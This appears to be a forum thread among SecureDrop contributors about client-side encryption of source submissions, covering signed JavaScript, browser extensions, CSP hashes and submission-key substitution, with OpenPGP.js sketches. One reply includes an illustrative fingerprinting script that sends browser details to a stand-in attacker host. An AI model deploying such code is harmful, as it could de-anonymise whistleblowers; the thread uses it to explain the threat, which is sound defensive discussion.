Prototyping client-side cryptography

I have read Issue #92 thoroughly and would like clarification on a few things:

  1. We are trying to achieve end-to-end encryption, so the source’s submissions have to be encrypted with the journalist’s public key. However, in some places there are comments stating that the submissions are encrypted to the instance’s public key, for example, this.
    So, is it the journalist’s or the instance’s?

  2. The browser add-on should enable JavaScript if and only if it sees a SecureDrop website and the signature verification succeeds, and disable it otherwise. Is this premise true? And if yes, alerting sources to turn on NoScript is unnecessary. Am I right?

  3. Presuming that signing takes place with a symmetric key that is baked into the extension, is there any chance that an adversary in control of the application server could get access to the key, enabling them to alter the JS file to carry their own public key while keeping the signature verification legitimate?

  • If yes, signing would have to be done by a developer or the admin each time the source server is requested. How would this be possible?

  • And if not, how would key management be handled securely?

@hariharanj4v4 on gitter you mentioned that you did some research on the topic and I’m curious to know more about that. Would you mind summarizing your research for us?

@dachary I would love to. By research, I meant the following:

  1. Read all the comments on Issue #92 and tried to understand them. This took most of the time.
  2. Went through this.
  3. Tried to understand some existing client-side crypto implementations, such as MEGA’s.
  4. Had a look at Mailvelope and their client-side model.
  5. Installed this extension and had a look at how it works.

@redshiftzero @emkll My 1st and 3rd doubts have been clarified. Submissions are always encrypted using the instance’s public key, irrespective of the journalist, and decrypted at the SVS with the instance’s private key. And signing the pages asymmetrically when they are uploaded would solve the problem addressed in my 3rd doubt. Is my understanding right?

Hi @hariharanj4v4,

Thank you for starting this discussion. Yes, exactly! There is only one submission keypair per SecureDrop instance, and the private key resides on the airgapped SVS.

Indeed, there are several ways to solve this problem, and this is why investigative work is needed, to prototype and evaluate which would be best. Another library that could be interesting to look at is the one used by protonmail: https://github.com/openpgpjs/openpgpjs/.

As you mention, signing the client-side code (whether it’s JavaScript or perhaps a browser extension) would validate its integrity and authenticity. SecureDrop rarely relies on a single security control; we use defense-in-depth to ensure complementary security controls are applied. In the case of JavaScript cryptography, we could also use a Content Security Policy hash value, for example, to add another mechanism to verify the integrity of the code delivered to the browser.
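
For instance, the hash of the served script can be computed at deploy time and sent in the response header; a minimal sketch (Node.js built-ins only, with `source.js` as a placeholder for the script the instance serves):

```js
// Compute a CSP script hash at deploy time (Node.js built-ins only).
// 'source.js' is a placeholder for the JS file the instance serves.
const crypto = require('crypto');
const fs = require('fs');

const digest = crypto
  .createHash('sha256')
  .update(fs.readFileSync('source.js'))
  .digest('base64');

// With this header set, the browser refuses to run any script whose
// hash does not match the one computed from the deployed file.
console.log(`Content-Security-Policy: script-src 'sha256-${digest}'`);
```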

Hi @mickael, thanks for the response. As you said,

Indeed, there are several ways to solve this problem, and this is why investigative work is needed, to prototype and evaluate which would be best.

Apart from the approach described by @redshiftzero here, there is also this simple implementation possible, where:

  1. The current front end isn’t changed, i.e., no additional JS to perform client-side crypto is added.
  2. The web pages aren’t signed (the security implications are discussed in a moment).
  3. We implement a browser extension which performs the crypto when uploading and downloading documents from a SecureDrop website (see the sketch below).
  4. Since we assume that sources turn on NoScript, we need not worry about an attacker-controlled web page that could void source anonymity.
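
To make item 3 concrete, here is a minimal sketch of the encryption step, assuming OpenPGP.js (v5 API) is bundled with the extension and exposed as `openpgp`; the function name and `armoredInstanceKey` are hypothetical:

```js
// Sketch only: encrypt a submission to the instance's public key before
// upload. Assumes OpenPGP.js v5 bundled with the extension as `openpgp`;
// `armoredInstanceKey` stands in for however the extension obtains the key.
async function encryptForInstance(fileBytes, armoredInstanceKey) {
  const encryptionKeys = await openpgp.readKey({ armoredKey: armoredInstanceKey });
  const message = await openpgp.createMessage({ binary: fileBytes }); // fileBytes: Uint8Array
  // Returns binary ciphertext, ready to upload in place of the plaintext.
  return openpgp.encrypt({ message, encryptionKeys, format: 'binary' });
}
```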

There are a few upsides to this:

No need to rely on the security of a JS crypto library. As you mentioned earlier,

Another library that could be interesting to look at is the one used by protonmail: https://github.com/openpgpjs/openpgpjs/.

there are a lot of client-side crypto libraries available, and we could analyze which is the most secure and use it; but with this implementation, there would simply be no need for JS to run in the client at all. We also wouldn’t disturb the current functionality of NoScript, which disables all scripts from any site.

However there is this downside too:

Since we don’t perform signing anywhere, the client loses the ability to red-flag any malicious activity, such as an integrity verification failure.

If red-flagging isn’t a big concern here, this approach could be a good one to consider and analyze further. What are your opinions? @mickael @redshiftzero

Thanks for your reply!

Indeed, that is true. Technically proficient sources already know how (or can easily search online) to encrypt files on the command line or use existing software, but the goal of this project is to make end-to-end encryption accessible to all potential sources. Doing it transparently would obviously be the easiest from an end-user perspective. A big portion of this is a UX challenge: we want to deliver a high level of submission confidentiality and source anonymity to all potential sources (whether they are technically proficient in the use of encryption technologies or not).

In this client-side cryptography use-case, the reason why we care so much about the integrity of the code is that it will be running on the user’s machine, and could be used to fingerprint or de-anonymize a source. All other assets served by SecureDrop instances are static, and given the anonymity properties provided by the Tor Browser, should provide strong guarantees for source anonymity.

Of course yes and we will!

This implementation should provide anonymity to all potential sources, irrespective of their technical proficiency. And the user experience will not suffer at all. The browser extension simply sits in the corner and does all the crypto work; the user never needs to interact with it. All the user needs to do is select the documents, and when they click the upload button, the extension performs the encryption and sends them to the source server. Decryption happens similarly in spirit. Hence, the user experience never changes at all.
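
A rough sketch of that flow, reusing the hypothetical `encryptForInstance()` from the earlier sketch (the form selector and field name are made up):

```js
// Sketch only: hook the submission form so encryption is transparent to
// the user. '#upload-form', '#doc-upload' and the 'doc' field name are
// hypothetical; armoredInstanceKey is assumed to be held by the extension.
document.querySelector('#upload-form').addEventListener('submit', async (event) => {
  event.preventDefault();
  const file = document.querySelector('#doc-upload').files[0];
  const plaintext = new Uint8Array(await file.arrayBuffer());
  const ciphertext = await encryptForInstance(plaintext, armoredInstanceKey);

  // Swap the plaintext document for its ciphertext, then submit as usual.
  const body = new FormData(event.target);
  body.set('doc', new Blob([ciphertext]), file.name + '.gpg');
  await fetch(event.target.action, { method: 'POST', body });
});
```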

I understand it very well. Source anonymity is our utmost priority. In the implementation that I proposed, even if the attacker modifies the source pages to include malicious code, since the browser blocks all scripts using NoScript, there wouldn’t be any possibility of fingerprinting.

Am I right? If not, can you help me understand by giving an example of how this implementation would be a security flaw?

As suggested by @redshiftzero here, even if we build a browser extension that verifies the signature and only executes the JavaScript if the signature verifies, for which we’d need the release key baked into the extension, an inspector who sees the browser extension and reverse engineers it would know that the source is trying to contact a SecureDrop server, thus destroying plausible deniability. Am I correct? @mickael @redshiftzero

Yes, @hariharanj4v4, the presence of a SecureDrop-specific browser extension would definitely remove plausible deniability if it were uncovered by an adversary (add-ons persist across Tor Browser sessions, and it is unclear what information would remain at a forensic level). For now, at a high level, there are two solutions that were brought forward in the past:

  • JavaScript served by the SecureDrop instance (higher traffic-fingerprinting resistance / deniability; lower integrity of code, as only the SD server needs to be compromised), but NoScript needs to be disabled.
  • Downloaded browser plugin (lower traffic-fingerprinting resistance / deniability; higher integrity, as the plugin also needs to be compromised), with no need to disable NoScript.

Regarding the fingerprinting/de-anonymizing using JavaScript, this is an example. This is why we recommend sources disable JavaScript in Tor Browser.
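
To give a flavor of the threat, here is a purely illustrative snippet of the kind of data a malicious script could gather and exfiltrate (the endpoint is made up):

```js
// Illustrative only: a few attributes a malicious script could collect
// to help fingerprint a visitor.
const probe = {
  userAgent: navigator.userAgent,
  language: navigator.language,
  screen: [screen.width, screen.height, screen.colorDepth],
  timezoneOffset: new Date().getTimezoneOffset(),
};
// Exfiltrate to an attacker-controlled endpoint (hypothetical URL).
fetch('https://attacker.example/collect', { method: 'POST', body: JSON.stringify(probe) });
```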

Thanks for the response @mickael,

I would also like to know which implementation I should start working on. You already gave your comments on this implementation, to which I replied here, explaining why this implementation would hold up.

Can you please have a look at my reply and tell me whether that is a secure option to implement? I think it is a secure implementation because we don’t require JS to run client-side, which rules out that whole class of attacks, while still doing client-side crypto without compromising the current UX. If yes, I will start working on a detailed timeline for its implementation. If not, I will start working on the idea described here.

Hi @hariharanj4v4 - you make great points regarding a SecureDrop browser extension that does all the crypto operations. I think that could provide both great UX and great security for sources.

To provide deniability for sources, if we were to have a SecureDrop-specific browser extension as you propose, we’d want to get it bundled into Tor Browser. This is possible, but would be a harder sell than a generic browser extension that prevents the execution of unsigned JavaScript (signed by a key in some list of legitimate developers, one of which would be the SecureDrop release key). One could imagine another option on the Tor Browser security slider alongside “Low - execute JavaScript”: “Safer - execute only signed JavaScript”. We suggested this approach because its generic design has a higher probability of being bundled into Tor Browser, since many projects may find it useful.
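
As a rough sketch of the check such a generic extension could perform (assuming OpenPGP.js v5 exposed as `openpgp`, and a detached ASCII-armored signature delivered alongside each script; `isSignatureValid` is a hypothetical name):

```js
// Sketch only: verify a detached armored signature over some text against
// a list of trusted developer keys baked into the extension.
async function isSignatureValid(text, armoredSignature, armoredKeys) {
  const verificationKeys = await Promise.all(
    armoredKeys.map((armoredKey) => openpgp.readKey({ armoredKey })),
  );
  const { signatures } = await openpgp.verify({
    message: await openpgp.createMessage({ text }),
    signature: await openpgp.readSignature({ armoredSignature }),
    verificationKeys,
  });
  try {
    await signatures[0].verified; // rejects if the signature is invalid
    return true; // the script may be executed
  } catch {
    return false; // block execution
  }
}
```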

An important security question for either implementation, worth investigating either in the proposal or during the summer, is: what prevents an attacker that compromises the application server from simply replacing the submission key with an attacker-controlled key? Is there any way to mitigate this risk? Could we perhaps make this detectable?

Thanks for the reply @redshiftzero.

This is a great idea for providing plausible deniability as well as getting the extension bundled into Tor Browser. Will surely work on this particular implementation of the browser extension.

Regarding the above question, I don’t get why it’s a threat. Let me explain why. The instance’s public key goes inside the `<html>` tag, and the JS uses it to encrypt the documents. The entire content inside this `<html>` tag, which includes the public key, is signed by a SecureDrop developer using a signing key. The browser extension checks the authenticity of the web pages using the corresponding verification key. So, even if an attacker who compromises the application server replaces the submission key with one of their own, the signature verification fails, the extension won’t run any code, and the source will not be able to upload any documents at all. Am I correct, or am I missing anything?

And all these arguments are based on the assumption that the attacker has no access to the developers’ signing key, which is a good assumption for security, because such a compromise is highly unlikely.
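
To illustrate, a signed page could look something like this (the layout, names, and placement are entirely hypothetical; the signature sits outside the signed `<html>` content so the extension can strip it before verifying):

```html
<!-- Hypothetical layout: none of these names are settled. -->
<html>
  <head>
    <!-- The instance's submission key, covered by the developer's signature. -->
    <meta name="securedrop-submission-key"
          content="-----BEGIN PGP PUBLIC KEY BLOCK----- ...">
  </head>
  <body>...</body>
</html>
<!--SIGNATURE
-----BEGIN PGP SIGNATURE----- ...
-->
```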


Ah - I’m glad you asked this @hariharanj4v4, as it hits on an important constraint. The JavaScript-verifying extension would actually not be verifying the submission keys (as currently sketched out, at least):

  1. SecureDrop releases and the JS would be signed by the SecureDrop release key.
  2. The submission key that the source encrypts to would be provided by each individual server. These can change independently of SecureDrop releases.

So clearly this is an issue: if we are replacing the problem of “an attacker that compromises the application server can snoop on plaintext documents in memory” with the problem of “an attacker that compromises the application server can snoop on documents encrypted to a key that the attacker controls”, then we’re not really making a major improvement. There are several possible solutions to this problem, and no magic bullet, but we’d want the student to explore how one could address this flaw (either with a design change or through some other method).

Thanks a lot for the reply @redshiftzero,

This made my understanding very clear. I see the threat now! Tell me if this would solve the problem:

The media organizations:

  • Provide the admin’s public key and email address, along with the SecureDrop onion address, on their SecureDrop landing page.

The developers:

  • Ship JS to encrypt submissions client-side to the instance’s public key.
  • Modify the current installation script to additionally:
    • embed the submission key of the instance inside the JS and HTML files
    • ask the admin for their private key and sign all the source pages with it
    • embed the signatures in the HTML files

The admins:

  • Follow the server installation procedure after setting up the submission key, and sign all the source pages along the way.

The sources:

  • Install Tor Browser, which comes with a built-in generic browser extension.
  • Configure it with the SecureDrop websites, their admins’ public keys, and their email addresses.

The generic browser extension:

  • Disables all scripts from any site by default, similar to NoScript.
  • Checks whether the requested website has been added to its configuration and, if so, fetches the corresponding public key of the signer (the admin, in our case).
  • Strips the signature from the web page, if present, and verifies the signature with the previously fetched public key.
    • Allows scripts to run if and only if the page authentication succeeds.
    • Emails the website admin, alerting them about a possible intrusion into their server (the Application Server, in our case), if the authentication fails.
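
To tie the pieces together, here is a sketch of that flow (`isSignatureValid()` is the hypothetical verifier sketched earlier in the thread; `getConfiguredSite`, `allowScripts`, `blockAllScripts`, and `notifyAdmin` are placeholders for extension internals):

```js
// Sketch only: the extension's per-page decision flow described above.
async function onPageLoad(url, pageHtml) {
  const site = await getConfiguredSite(url); // null if not a configured SecureDrop site
  if (site === null) return blockAllScripts();

  // Hypothetical convention: the detached signature travels in an HTML
  // comment and is stripped out before verification.
  const match = pageHtml.match(/<!--SIGNATURE\n([\s\S]*?)\n-->/);
  const signedContent = pageHtml.replace(/<!--SIGNATURE\n[\s\S]*?\n-->/, '');

  if (match !== null && await isSignatureValid(signedContent, match[1], [site.adminKey])) {
    allowScripts(); // page authentication succeeded
  } else {
    blockAllScripts();
    notifyAdmin(site.adminEmail, url); // red-flag a possible server intrusion
  }
}
```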

Would this implementation be secure?

Hi folks! I love this thread… though I’m curious, how is this a UX issue? Is the issue that a user is entering the wrong key? It sounds like a technical issue, unless I’m mistaken.

…also, no—I have not read through the full issue on GH. Scrambling to multi-task, and from what I’ve read above, I don’t understand 90% of what’s being discussed, anyway. :smiley: